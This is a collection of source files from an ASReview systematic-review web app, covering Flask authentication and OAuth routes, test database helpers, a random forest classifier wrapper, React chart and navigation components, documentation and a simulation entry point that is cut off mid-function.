= (200, \"Password updated.\")\n except ValueError as e:\n DB.session.rollback()\n result = (500, f\"Unable to reset your password! Reason: {str(e)}\")\n except SQLAlchemyError as e:\n DB.session.rollback()\n result = (500, f\"Unable to reset your password! Reason: {str(e)}\")\n else:\n result = (404, \"Reset-password feature is not used in this app.\")\n\n status, message = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/update_profile\", methods=[\"POST\"])\n@asreview_login_required\ndef update_profile():\n \"\"\"Update user profile\"\"\"\n user = User.query.filter(User.id == current_user.id).one_or_none()\n if user:\n email = request.form.get(\"email\", \"\").strip()\n name = request.form.get(\"name\", \"\").strip()\n affiliation = request.form.get(\"affiliation\", \"\").strip()\n password = request.form.get(\"password\", None)\n public = bool(int(request.form.get(\"public\", \"1\")))\n\n try:\n user = user.update_profile(email, name, affiliation, password, public)\n DB.session.commit()\n result = (200, \"User profile updated.\")\n except ValueError as e:\n result = (500, f\"Unable to update your profile! Reason: {str(e)}\")\n except IntegrityError as e:\n DB.session.rollback()\n result = (500, f\"Unable to update your profile! Reason: {str(e)}\")\n except SQLAlchemyError as e:\n DB.session.rollback()\n result = (500, f\"Unable to update your profile! Reason: {str(e)}\")\n\n else:\n result = (404, \"No user found\")\n\n status, message = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/refresh\", methods=[\"GET\"])\ndef refresh():\n if current_user and isinstance(current_user, User):\n logged_in = current_user.is_authenticated\n name = current_user.get_name()\n id = current_user.id\n else:\n logged_in = False\n name = \"\"\n id = None\n\n result = {\"logged_in\": logged_in, \"name\": name, \"id\": id}\n\n response = jsonify(result)\n return response, 200\n\n\[email protected](\"/signout\", methods=[\"DELETE\"])\n@asreview_login_required\ndef signout():\n if current_user:\n identifier = current_user.identifier\n logout_user()\n result = (200, f\"User with identifier {identifier} has been signed out.\")\n else:\n result = (404, \"No user found, no one can be signed out.\")\n\n status, message = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/oauth_callback\", methods=[\"POST\"])\ndef oauth_callback():\n # get parameters\n code = request.form.get(\"code\", \"\").strip()\n provider = request.form.get(\"provider\", \"\").strip()\n redirect_uri = request.form.get(\"redirect_uri\", \"\").strip()\n\n # assuming we have this provider\n oauth_handler = current_app.config.get(\"OAUTH\", False)\n if (\n isinstance(oauth_handler, OAuthHandler)\n and provider in oauth_handler.providers()\n ):\n # get user credentials for this user\n (identifier, email, name) = oauth_handler.get_user_credentials(\n provider, code, redirect_uri\n )\n # try to find this user\n user = User.query.filter(User.identifier == identifier).one_or_none()\n # flag for response (I'd like to communicate if this user was created)\n created_account = False\n # if not create user\n if user is None:\n try:\n origin = provider\n confirmed = True\n public = True\n user = User(\n identifier=identifier,\n origin=origin,\n email=email,\n name=name,\n confirmed=confirmed,\n public=public,\n )\n DB.session.add(user)\n DB.session.commit()\n created_account = True\n except SQLAlchemyError:\n DB.session.rollback()\n message = \"OAuth: unable to create your account!\"\n # return this immediately\n return jsonify({\"data\": message}), 500\n\n # log in the existing/created user immediately\n logged_in = perform_login_user(user)\n result = (\n 200,\n {\n \"account_created\": created_account,\n \"logged_in\": logged_in,\n \"name\": user.get_name(),\n \"id\": user.id,\n },\n )\n else:\n result = (400, {\"data\": f\"OAuth provider {provider} could not be found\"})\n\n status, message = result\n response = jsonify(message)\n return response, status\n" }, { "alpha_fraction": 0.6951219439506531, "alphanum_fraction": 0.6951219439506531, "avg_line_length": 48.20000076293945, "blob_id": "e0eb58332be6d4a720feb861e35ee50c5cc6f633", "content_id": "156931c2aa65c600a170b3c3a660271524f45959", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 246, "license_type": "permissive", "max_line_length": 53, "num_lines": 5, "path": "/asreview/webapp/src/icons/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "export { default as CoronaIcon } from \"./CoronaIcon\";\nexport { default as ElasIcon } from \"./ElasIcon\";\nexport { default as PlusIcon } from \"./PlusIcon\";\nexport { default as DOIIcon } from \"./DOIIcon\";\nexport { default as Orcid } from \"./Orcid\";\n" }, { "alpha_fraction": 0.7848324775695801, "alphanum_fraction": 0.7848324775695801, "avg_line_length": 69.8125, "blob_id": "02388ed033e07a0a5c4b64aaf85406b24945da40", "content_id": "3d32243ab01eb641af64d5f20b465062f676dfd4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1134, "license_type": "permissive", "max_line_length": 449, "num_lines": 16, "path": "/docs/source/simulation_results.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "\nAnalyzing results\n=================\n\nAfter a simulation, the results are stored in the ASReview project file\n(extension `.asreview`). This file contains a large number of variables and\nlogs on the simulation. The data can be extracted from the project file via the API or with one of the available extensions. See :doc:`these examples on the Project API <example_api_asreview_file>` for more information about opening the project file. \n\nOne readily available extension for analyzing the results of a simulation is `ASReview Insights <https://github.com/asreview/asreview-insights>`_. This extension offers valuable tools for plotting the recall and extracting the statistical results of several performance metrics, such as the Work Saved over Sampling (WSS), the proportion of Relevant Record Found (RRF), the Extra Relevant records Found (ERF), and the Average Time to Discover (ATD).\n\nInstall ASReview Insights directly from PyPi:\n\n.. code-block:: bash\n\n\tpip install asreview-insights\n\nDetailed documentation on the extension can be found on the `ASReview Insights <https://github.com/asreview/asreview-insights>`_ project page.\n" }, { "alpha_fraction": 0.6786279678344727, "alphanum_fraction": 0.6799472570419312, "avg_line_length": 22.6875, "blob_id": "fa412e7986562f374da85502c6478f29225549d4", "content_id": "2722402cd69ceff10115080f023cc69285db74ce", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3790, "license_type": "permissive", "max_line_length": 85, "num_lines": 160, "path": "/asreview/webapp/tests/utils/crud.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import asreview.webapp.tests.utils.config_parser as cp\nfrom asreview.webapp.authentication.models import Collaboration\nfrom asreview.webapp.authentication.models import CollaborationInvitation\nfrom asreview.webapp.authentication.models import Project\nfrom asreview.webapp.authentication.models import User\n\n\ndef create_user(DB, user=1):\n if isinstance(user, int):\n user = cp.get_user(user)\n try:\n DB.session.add(user)\n DB.session.commit()\n user = User.query.order_by(User.id.desc()).first()\n except Exception as exception:\n user = False\n DB.session.rollback()\n DB.session.flush()\n raise exception\n return user\n\n\ndef get_user_by_id(id):\n return User.query.filter_by(id=id).one()\n\n\ndef get_user_by_identifier(id):\n return User.query.filter_by(identifier=id).one()\n\n\ndef list_users():\n return User.query.all()\n\n\ndef count_users():\n return len(User.query.with_entities(User.id).all())\n\n\ndef update_user(DB, user, attribute, value):\n user = get_user_by_identifier(user.identifier)\n setattr(user, attribute, value)\n DB.session.commit()\n return user\n\n\ndef last_user():\n return User.query.order_by(User.id.desc()).first()\n\n\ndef delete_users(DB):\n DB.session.query(User).delete()\n DB.session.commit()\n\n\ndef delete_collaborations(DB):\n DB.session.query(Collaboration).delete()\n DB.session.commit()\n\n\ndef delete_invitations(DB):\n DB.session.query(CollaborationInvitation).delete()\n DB.session.commit()\n\n\ndef delete_projects(DB):\n DB.session.query(Project).delete()\n DB.session.commit()\n\n\ndef delete_everything(DB):\n DB.drop_all()\n\n\ndef create_project(DB, user, project):\n try:\n user.projects.append(project)\n DB.session.commit()\n id = project.project_id\n project = Project.query.filter_by(project_id=id).one()\n except Exception as exception:\n project = False\n DB.session.rollback()\n DB.session.flush()\n raise exception\n return project\n\n\ndef get_project_by_project_id(id):\n return Project.query.filter_by(project_id=id).one()\n\n\ndef list_projects():\n return Project.query.all()\n\n\ndef count_projects():\n return len(Project.query.with_entities(Project.id).all())\n\n\ndef last_project():\n return Project.query.order_by(Project.id.desc()).first()\n\n\ndef create_invitation(DB, project, user):\n try:\n inv = CollaborationInvitation(project_id=project.id, user_id=user.id)\n DB.session.add(inv)\n DB.session.commit()\n except Exception as exception:\n DB.session.rollback()\n DB.session.flush()\n raise exception\n\n\ndef list_invitations():\n return CollaborationInvitation.query.all()\n\n\ndef last_invitation():\n return CollaborationInvitation.query.order_by(\n CollaborationInvitation.id.desc()\n ).first()\n\n\ndef count_invitations():\n return len(\n CollaborationInvitation.query.with_entities(CollaborationInvitation.id).all()\n )\n\n\ndef create_collaboration(DB, project, user):\n try:\n coll = Collaboration(project_id=project.id, user_id=user.id)\n DB.session.add(coll)\n DB.session.commit()\n except Exception as exception:\n DB.session.rollback()\n DB.session.flush()\n raise exception\n\n\ndef list_collaborations():\n return Collaboration.query.all()\n\n\ndef last_collaboration():\n return Collaboration.query.order_by(Collaboration.id.desc()).first()\n\n\ndef count_collaborations():\n return len(Collaboration.query.with_entities(Collaboration.id).all())\n\n\ndef create_user1_with_2_projects(DB):\n user = create_user(DB)\n project_ids = [\"project-1\", \"project-2\"]\n projects = [Project(project_id=p) for p in project_ids]\n user.projects = projects\n DB.session.commit()\n return user, projects\n" }, { "alpha_fraction": 0.663431704044342, "alphanum_fraction": 0.6781832575798035, "avg_line_length": 35.79999923706055, "blob_id": "f4b79da4af627cfcfd057370ae1bf1021c127433", "content_id": "8431dd04018738f67c76ee725ed0821792674966", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2576, "license_type": "permissive", "max_line_length": 84, "num_lines": 70, "path": "/asreview/models/classifiers/rf.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom sklearn.ensemble import RandomForestClassifier as SKRandomForestClassifier\n\nfrom asreview.models.classifiers.base import BaseTrainClassifier\nfrom asreview.models.classifiers.utils import _set_class_weight\n\n\nclass RandomForestClassifier(BaseTrainClassifier):\n \"\"\"\n Random forest classifier (``rf``).\n\n The Random Forest classifier is an implementation based\n on the sklearn Random Forest classifier.\n\n Arguments\n ---------\n n_estimators : int, default=100\n The number of trees in the forest.\n max_features: int, default=10\n Number of features in the model.\n class_weight: float, default=1.0\n Class weight of the inclusions.\n random_state : int or RandomState, default=None\n Controls both the randomness of the bootstrapping of the samples used\n when building trees and the sampling of the features to consider when\n looking for the best split at each node.\n \"\"\"\n\n name = \"rf\"\n label = \"Random forest\"\n\n def __init__(\n self, n_estimators=100, max_features=10, class_weight=1.0, random_state=None\n ):\n super(RandomForestClassifier, self).__init__()\n self.n_estimators = int(n_estimators)\n self.max_features = int(max_features)\n self.class_weight = class_weight\n self._random_state = random_state\n\n self._model = SKRandomForestClassifier(\n n_estimators=self.n_estimators,\n max_features=self.max_features,\n class_weight=_set_class_weight(class_weight),\n random_state=random_state,\n )\n\n def full_hyper_space(self):\n from hyperopt import hp\n\n hyper_choices = {}\n hyper_space = {\n \"mdl_n_estimators\": hp.quniform(\"mdl_n_estimators\", 10, 100, 1),\n \"mdl_max_features\": hp.quniform(\"mdl_max_features\", 6, 10, 1),\n \"mdl_class_weight\": hp.lognormal(\"mdl_class_weight\", 0, 1),\n }\n return hyper_space, hyper_choices\n" }, { "alpha_fraction": 0.579059362411499, "alphanum_fraction": 0.585442304611206, "avg_line_length": 27.259492874145508, "blob_id": "d0807f0c6a508074fd2c04f3990ce8e22f2eb340", "content_id": "e56d98703157222faea586c4342330d1246630ac", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8930, "license_type": "permissive", "max_line_length": 124, "num_lines": 316, "path": "/asreview/webapp/src/ProjectComponents/AnalyticsComponents/ProgressRecallChart.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport Chart from \"react-apexcharts\";\nimport { Card, CardContent, Stack, Typography } from \"@mui/material\";\nimport { styled, useTheme } from \"@mui/material/styles\";\n\nimport { CardErrorHandler } from \"../../Components\";\nimport { TypographySubtitle1Medium } from \"../../StyledComponents/StyledTypography.js\";\n\nconst PREFIX = \"ProgressRecallChart\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n tooltipCardColor: `${PREFIX}-tooltip-card-color`,\n tooltipLabelContainer: `${PREFIX}-tooltip-label-container`,\n tooltipLabelMarkerASReviewColor: `${PREFIX}-tooltip-label-marker-asreview-color`,\n tooltipLabelMarkerRandomColor: `${PREFIX}-tooltip-label-marker-random-color`,\n tooltipLabelASReviewNumber: `${PREFIX}-tooltip-label-asreview-number`,\n tooltipLabelRandomNumber: `${PREFIX}-tooltip-label-random-number`,\n tooltipLabelTextSecondaryColor: `${PREFIX}-tooltip-label-text-secondary-color`,\n tooltipDividerColor: `${PREFIX}-tooltip-divider-color`,\n};\n\nconst StyledCard = styled(Card)(({ theme }) => ({\n borderRadius: 16,\n maxWidth: 960,\n overflow: \"visible\",\n position: \"relative\",\n width: \"100%\",\n [`& .${classes.root}`]: {\n paddingTop: 24,\n paddingLeft: 32,\n paddingRight: 32,\n },\n\n [`& .${classes.tooltipCardColor}`]: {\n color: theme.palette.text.primary,\n background: theme.palette.background.paper,\n },\n\n [`& .${classes.tooltipLabelContainer}`]: {\n display: \"flex\",\n justifyContent: \"space-between\",\n },\n\n [`& .${classes.tooltipLabelMarkerASReviewColor}`]: {\n ...(theme.palette.mode === \"light\" && {\n color: theme.palette.primary.light,\n background: theme.palette.primary.light,\n }),\n ...(theme.palette.mode === \"dark\" && {\n color: theme.palette.primary.main,\n background: theme.palette.primary.main,\n }),\n },\n\n [`& .${classes.tooltipLabelMarkerRandomColor}`]: {\n ...(theme.palette.mode === \"light\" && {\n color: theme.palette.secondary.light,\n background: theme.palette.secondary.light,\n }),\n ...(theme.palette.mode === \"dark\" && {\n color: theme.palette.secondary.main,\n background: theme.palette.secondary.main,\n }),\n },\n\n [`& .${classes.tooltipLabelASReviewNumber}`]: {\n marginLeft: 32,\n ...(theme.palette.mode === \"dark\" && {\n color: theme.palette.primary.main,\n }),\n },\n\n [`& .${classes.tooltipLabelRandomNumber}`]: {\n marginLeft: 32,\n ...(theme.palette.mode === \"dark\" && {\n color: theme.palette.secondary.main,\n }),\n },\n\n [`& .${classes.tooltipLabelTextSecondaryColor}`]: {\n color: theme.palette.text.secondary,\n },\n\n [`& .${classes.tooltipDividerColor}`]: {\n borderColor: theme.palette.divider,\n },\n}));\n\nconst customTooltip = ({ series, seriesIndex, dataPointIndex, w }) => {\n let total = dataPointIndex + 1;\n return (\n `<div class=\"tooltip-card ProgressRecallChart-tooltip-card-color\">` +\n `<div class=\"tooltip-card-content\">` +\n '<h6 class=\"tooltip-title\">' +\n total +\n ` reviewed records` +\n \"</h6>\" +\n '<div class=\"ProgressRecallChart-tooltip-label-container\">' +\n \"<div>\" +\n \"<div>\" +\n `<span class=\"apexcharts-legend-marker tooltip-label-marker ProgressRecallChart-tooltip-label-marker-asreview-color\">` +\n \"</span>\" +\n `<span class=\"apexcharts-legend-text tooltip-label-text\">` +\n \"Relevant by ASReview LAB\" +\n \"</span>\" +\n \"</div>\" +\n `<p class=\"tooltip-label-text-secondary ProgressRecallChart-tooltip-label-text-secondary-color\">` +\n \"Relevant records that you labeled assisted by the active learning model\" +\n \"</p>\" +\n \"</div>\" +\n `<h6 class=\"tooltip-label-number ProgressRecallChart-tooltip-label-asreview-number\">` +\n series[0][dataPointIndex] +\n \"</h6>\" +\n \"</div>\" +\n `<hr class=\"tooltip-divider ProgressRecallChart-tooltip-divider-color\">` +\n '<div class=\"ProgressRecallChart-tooltip-label-container\">' +\n \"<div>\" +\n \"<div>\" +\n `<span class=\"apexcharts-legend-marker tooltip-label-marker ProgressRecallChart-tooltip-label-marker-random-color\">` +\n \"</span>\" +\n `<span class=\"apexcharts-legend-text tooltip-label-text\">` +\n \"Random relevant\" +\n \"</span>\" +\n \"</div>\" +\n `<p class=\"tooltip-label-text-secondary ProgressRecallChart-tooltip-label-text-secondary-color\">` +\n \"Relevant records that you might find if you manually reviewed all the records\" +\n \"</p>\" +\n \"</div>\" +\n `<h6 class=\"tooltip-label-number ProgressRecallChart-tooltip-label-random-number\">` +\n series[1][dataPointIndex] +\n \"</h6>\" +\n \"</div>\" +\n \"</div>\" +\n \"</div>\"\n );\n};\n\nexport default function ProgressRecallChart(props) {\n const theme = useTheme();\n\n const lightModePrimaryColor = React.useCallback(() => {\n return theme.palette.mode === \"light\"\n ? theme.palette.primary.light\n : theme.palette.primary.main;\n }, [theme.palette.mode, theme.palette.primary]);\n\n const lightModeSecondaryColor = React.useCallback(() => {\n return theme.palette.mode === \"light\"\n ? theme.palette.secondary.light\n : theme.palette.secondary.main;\n }, [theme.palette.mode, theme.palette.secondary]);\n\n /**\n * Chart data array\n */\n const seriesArray = React.useCallback(() => {\n if (props.progressRecallQuery.data) {\n return [\n {\n name: \"Relevant by ASReview LAB\",\n data: props.progressRecallQuery.data?.asreview,\n },\n {\n name: \"Random relevant\",\n data: props.progressRecallQuery.data?.random,\n },\n ];\n } else {\n return [];\n }\n }, [props.progressRecallQuery.data]);\n\n const maxY = React.useCallback(() => {\n if (seriesArray()[0]?.data !== undefined) {\n return Math.max.apply(\n Math,\n seriesArray()[0]?.data.map((element) => {\n return element.y;\n }),\n );\n } else {\n return undefined;\n }\n }, [seriesArray]);\n\n /**\n * Chart options\n */\n const optionsChart = React.useCallback(() => {\n return {\n chart: {\n animations: {\n enabled: false,\n },\n background: \"transparent\",\n id: \"ASReviewLABprogressRecall\",\n type: \"line\",\n toolbar: {\n show: !props.mobileScreen,\n },\n zoom: {\n enabled: false,\n },\n },\n colors: [lightModePrimaryColor(), lightModeSecondaryColor()],\n dataLabels: {\n enabled: false,\n },\n legend: {\n position: \"top\",\n horizontalAlign: \"left\",\n fontSize: !props.mobileScreen ? \"14px\" : \"12px\",\n fontFamily: theme.typography.subtitle2.fontFamily,\n fontWeight: theme.typography.subtitle2.fontWeight,\n labels: {\n colors: theme.palette.text.secondary,\n },\n markers: {\n width: 8,\n height: 8,\n offsetX: -4,\n },\n itemMargin: {\n horizontal: 16,\n },\n },\n markers: {\n size: 0,\n },\n noData: {\n text: \"No data available\",\n },\n stroke: {\n curve: \"smooth\",\n lineCap: \"round\",\n width: 2,\n },\n theme: {\n mode: theme.palette.mode,\n },\n tooltip: {\n custom: customTooltip,\n },\n xaxis: {\n decimalsInFloat: 0,\n labels: {\n show: true,\n },\n title: {\n text: \"Number of reviewed records\",\n },\n type: \"numeric\",\n axisTicks: {\n show: false,\n },\n tooltip: {\n enabled: false,\n },\n },\n yaxis: {\n labels: {\n formatter: function (val, index) {\n return val.toFixed();\n },\n },\n showAlways: false,\n max: maxY(),\n forceNiceScale: false,\n tickAmount: maxY() < 6 ? maxY() : 6,\n title: {\n text: \"Number of relevant records\",\n },\n },\n };\n }, [\n theme,\n lightModePrimaryColor,\n lightModeSecondaryColor,\n maxY,\n props.mobileScreen,\n ]);\n\n const [series, setSeries] = React.useState(seriesArray());\n const [options, setOptions] = React.useState(optionsChart());\n\n React.useEffect(() => {\n setSeries(seriesArray());\n setOptions(optionsChart());\n }, [seriesArray, optionsChart]);\n\n return (\n <StyledCard elevation={2}>\n <CardErrorHandler\n queryKey={\"fetchProgressRecall\"}\n error={props.progressRecallQuery.error}\n isError={props.progressRecallQuery.isError}\n />\n <CardContent className={classes.root}>\n <Stack spacing={2}>\n {!props.mobileScreen && <Typography variant=\"h6\">Recall</Typography>}\n {props.mobileScreen && (\n <TypographySubtitle1Medium>Recall</TypographySubtitle1Medium>\n )}\n <Chart\n options={options}\n series={series}\n type=\"line\"\n height={400}\n width=\"100%\"\n />\n </Stack>\n </CardContent>\n </StyledCard>\n );\n}\n" }, { "alpha_fraction": 0.5636661052703857, "alphanum_fraction": 0.5669394731521606, "avg_line_length": 22.5, "blob_id": "1615c43c7c6b5a20d57e44cc01a193afa18bb01e", "content_id": "f19a23ce81da59eb642aae3d38518bbdf96efbd4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3055, "license_type": "permissive", "max_line_length": 77, "num_lines": 130, "path": "/asreview/webapp/src/Components/DrawerItem.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport {\n useMatch,\n useNavigate,\n useParams,\n useResolvedPath,\n} from \"react-router-dom\";\nimport {\n ListItemButton,\n ListItemIcon,\n ListItemText,\n Tooltip,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport {\n ArrowBack,\n Assignment,\n Assessment,\n Dashboard,\n Download,\n Edit,\n History,\n PeopleAlt,\n} from \"@mui/icons-material\";\n\nconst PREFIX = \"DrawerItem\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n icon: `${PREFIX}-icon`,\n textSelected: `${PREFIX}-textSelected`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.root}`]: {\n [`:before`]: {\n top: 0,\n left: 0,\n width: 4,\n height: \"100%\",\n content: \"' '\",\n position: \"absolute\",\n backgroundColor: theme.palette.primary.main,\n },\n },\n\n [`& .${classes.icon}`]: {\n paddingLeft: 8,\n },\n\n [`& .${classes.textSelected}`]: {\n color: theme.palette.primary.main,\n fontWeight: 600,\n },\n}));\n\nconst DrawerItem = (props) => {\n const navigate = useNavigate();\n const { project_id } = useParams();\n\n const resolved = useResolvedPath(props.path);\n const match = useMatch({ path: resolved.pathname, end: true });\n\n const returnSelectedState = () => {\n return match !== null;\n };\n\n const returnIconColor = () => {\n return returnSelectedState() ? \"primary\" : \"inherit\";\n };\n\n const returnIconState = () => {\n // home page navigation\n if (!project_id && props.label === \"Projects\") {\n return <Dashboard color={returnIconColor()} />;\n }\n\n // project page navigation\n if (project_id && props.label === \"Projects\") {\n return <ArrowBack />;\n }\n if (props.label === \"Analytics\") {\n return <Assessment color={returnIconColor()} />;\n }\n if (props.label === \"Review\") {\n return <Assignment color={returnIconColor()} />;\n }\n if (props.label === \"History\") {\n return <History color={returnIconColor()} />;\n }\n if (props.label === \"Team\") {\n return <PeopleAlt color={returnIconColor()} />;\n }\n if (props.label === \"Export\") {\n return <Download color={returnIconColor()} />;\n }\n if (props.label === \"Details\") {\n return <Edit color={returnIconColor()} />;\n }\n };\n\n return (\n <Root>\n <Tooltip disableHoverListener={props.onNavDrawer} title={props.label}>\n <ListItemButton\n selected={returnSelectedState()}\n onClick={() => {\n if (props.mobileScreen) {\n props.toggleNavDrawer();\n }\n navigate(props.path);\n }}\n className={returnSelectedState() ? classes.root : null}\n >\n <ListItemIcon className={classes.icon}>\n {returnIconState()}\n </ListItemIcon>\n <ListItemText\n primary={props.label}\n primaryTypographyProps={{\n className: returnSelectedState() ? classes.textSelected : null,\n }}\n />\n </ListItemButton>\n </Tooltip>\n </Root>\n );\n};\n\nexport default DrawerItem;\n" }, { "alpha_fraction": 0.5978330373764038, "alphanum_fraction": 0.5995438098907471, "avg_line_length": 33.133819580078125, "blob_id": "43942a5c900055e204a067181918390c07d39cd2", "content_id": "c4036acd6b6ba4e0988e323faa718795f0845dcb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14029, "license_type": "permissive", "max_line_length": 86, "num_lines": 411, "path": "/asreview/entry_points/simulate.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Simulation entry point and utils.\"\"\"\n\nimport argparse\nimport logging\nimport shutil\nfrom pathlib import Path\n\nfrom asreview.compat import convert_id_to_idx\nfrom asreview.config import DEFAULT_BALANCE_STRATEGY\nfrom asreview.config import DEFAULT_FEATURE_EXTRACTION\nfrom asreview.config import DEFAULT_MODEL\nfrom asreview.config import DEFAULT_N_INSTANCES\nfrom asreview.config import DEFAULT_N_PRIOR_EXCLUDED\nfrom asreview.config import DEFAULT_N_PRIOR_INCLUDED\nfrom asreview.config import DEFAULT_QUERY_STRATEGY\nfrom asreview.data import ASReviewData\nfrom asreview.data import load_data\nfrom asreview.entry_points.base import BaseEntryPoint\nfrom asreview.models.balance.utils import get_balance_model\nfrom asreview.models.classifiers import get_classifier\nfrom asreview.models.feature_extraction import get_feature_model\nfrom asreview.models.query import get_query_model\nfrom asreview.project import ASReviewProject\nfrom asreview.project import ProjectExistsError\nfrom asreview.project import open_state\nfrom asreview.review.simulate import ReviewSimulate\nfrom asreview.settings import ASReviewSettings\nfrom asreview.types import type_n_queries\nfrom asreview.utils import get_random_state\n\n\ndef _get_dataset_path_from_args(args_dataset):\n \"\"\"Remove 'benchmark:' from the dataset name and add .csv suffix.\n\n Parameters\n ----------\n args_dataset : str\n Name of the dataset.\n\n Returns\n -------\n str\n Dataset name without 'benchmark:' if it started with that,\n and with .csv suffix.\n \"\"\"\n if args_dataset.startswith(\"benchmark:\"):\n args_dataset = args_dataset[10:]\n\n return Path(args_dataset).with_suffix(\".csv\").name\n\n\ndef _set_log_verbosity(verbose):\n if verbose == 0:\n logging.getLogger().setLevel(logging.WARNING)\n elif verbose == 1:\n logging.getLogger().setLevel(logging.INFO)\n elif verbose >= 2:\n logging.getLogger().setLevel(logging.DEBUG)\n\n\nclass SimulateEntryPoint(BaseEntryPoint):\n \"\"\"Entry point for simulation with ASReview LAB.\"\"\"\n\n def execute(self, argv): # noqa\n # parse arguments\n parser = _simulate_parser()\n args = parser.parse_args(argv)\n\n # change the verbosity\n _set_log_verbosity(args.verbose)\n\n # check for state file extension\n if args.state_file is None:\n raise ValueError(\"Specify project file name (with .asreview extension).\")\n\n # for webapp\n if args.dataset == \"\":\n project = ASReviewProject(args.state_file)\n\n with open_state(args.state_file) as state:\n settings = state.settings\n\n # Check if there are new labeled records.\n exist_new_labeled_records = state.exist_new_labeled_records\n\n # collect command line arguments and pass them to the reviewer\n if exist_new_labeled_records:\n fp_data = Path(\n project.project_path, \"data\", project.config[\"dataset_path\"]\n )\n as_data = ASReviewData.from_file(fp_data)\n prior_idx = args.prior_idx\n\n classifier_model = get_classifier(settings.model)\n query_model = get_query_model(settings.query_strategy)\n balance_model = get_balance_model(settings.balance_strategy)\n feature_model = get_feature_model(settings.feature_extraction)\n\n # for simulation CLI\n else:\n # do this check now and again when zipping.\n if Path(args.state_file).exists():\n raise ProjectExistsError(\"Project already exists.\")\n\n as_data = load_data(args.dataset)\n\n if len(as_data) == 0:\n raise ValueError(\n \"Supply at least one dataset\" \" with at least one record.\"\n )\n\n # create a project file\n fp_tmp_simulation = Path(args.state_file).with_suffix(\".asreview.tmp\")\n\n project = ASReviewProject.create(\n fp_tmp_simulation,\n project_id=Path(args.state_file).stem,\n project_mode=\"simulate\",\n project_name=Path(args.state_file).stem,\n project_description=\"Simulation created via ASReview via \"\n \"command line interface\",\n )\n\n # Add the dataset to the project file.\n dataset_path = _get_dataset_path_from_args(args.dataset)\n\n as_data.to_file(Path(fp_tmp_simulation, \"data\", dataset_path))\n # Update the project.json.\n project.update_config(dataset_path=dataset_path)\n\n # create a new settings object from arguments\n settings = ASReviewSettings(\n model=args.model,\n n_instances=args.n_instances,\n stop_if=args.stop_if,\n n_prior_included=args.n_prior_included,\n n_prior_excluded=args.n_prior_excluded,\n query_strategy=args.query_strategy,\n balance_strategy=args.balance_strategy,\n feature_extraction=args.feature_extraction,\n )\n settings.from_file(args.config_file)\n\n # Initialize models.\n random_state = get_random_state(args.seed)\n classifier_model = get_classifier(\n settings.model, random_state=random_state, **settings.model_param\n )\n query_model = get_query_model(\n settings.query_strategy,\n random_state=random_state,\n **settings.query_param,\n )\n balance_model = get_balance_model(\n settings.balance_strategy,\n random_state=random_state,\n **settings.balance_param,\n )\n feature_model = get_feature_model(\n settings.feature_extraction,\n random_state=random_state,\n **settings.feature_param,\n )\n\n # prior knowledge\n if (\n args.prior_idx is not None\n and args.prior_record_id is not None\n and len(args.prior_idx) > 0\n and len(args.prior_record_id) > 0\n ):\n raise ValueError(\n \"Not possible to provide both prior_idx and prior_record_id\"\n )\n\n prior_idx = args.prior_idx\n if args.prior_record_id is not None and len(args.prior_record_id) > 0:\n prior_idx = convert_id_to_idx(as_data, args.prior_record_id)\n\n if classifier_model.name.startswith(\"lstm-\"):\n classifier_model.embedding_matrix = feature_model.get_embedding_matrix(\n as_data.texts, args.embedding_fp\n )\n\n try:\n # Initialize the review class.\n reviewer = ReviewSimulate(\n as_data,\n project=project,\n model=classifier_model,\n query_model=query_model,\n balance_model=balance_model,\n feature_model=feature_model,\n n_papers=args.n_papers,\n n_instances=args.n_instances,\n stop_if=args.stop_if,\n prior_indices=prior_idx,\n n_prior_included=args.n_prior_included,\n n_prior_excluded=args.n_prior_excluded,\n init_seed=args.init_seed,\n write_interval=args.write_interval,\n )\n\n # Start the review process.\n project.update_review(status=\"review\")\n\n with open_state(project, read_only=True) as s:\n prior_df = s.get_priors()\n\n print(\"The following records are prior knowledge:\\n\")\n for i, row in prior_df.iterrows():\n preview = as_data.record(row[\"record_id\"])\n 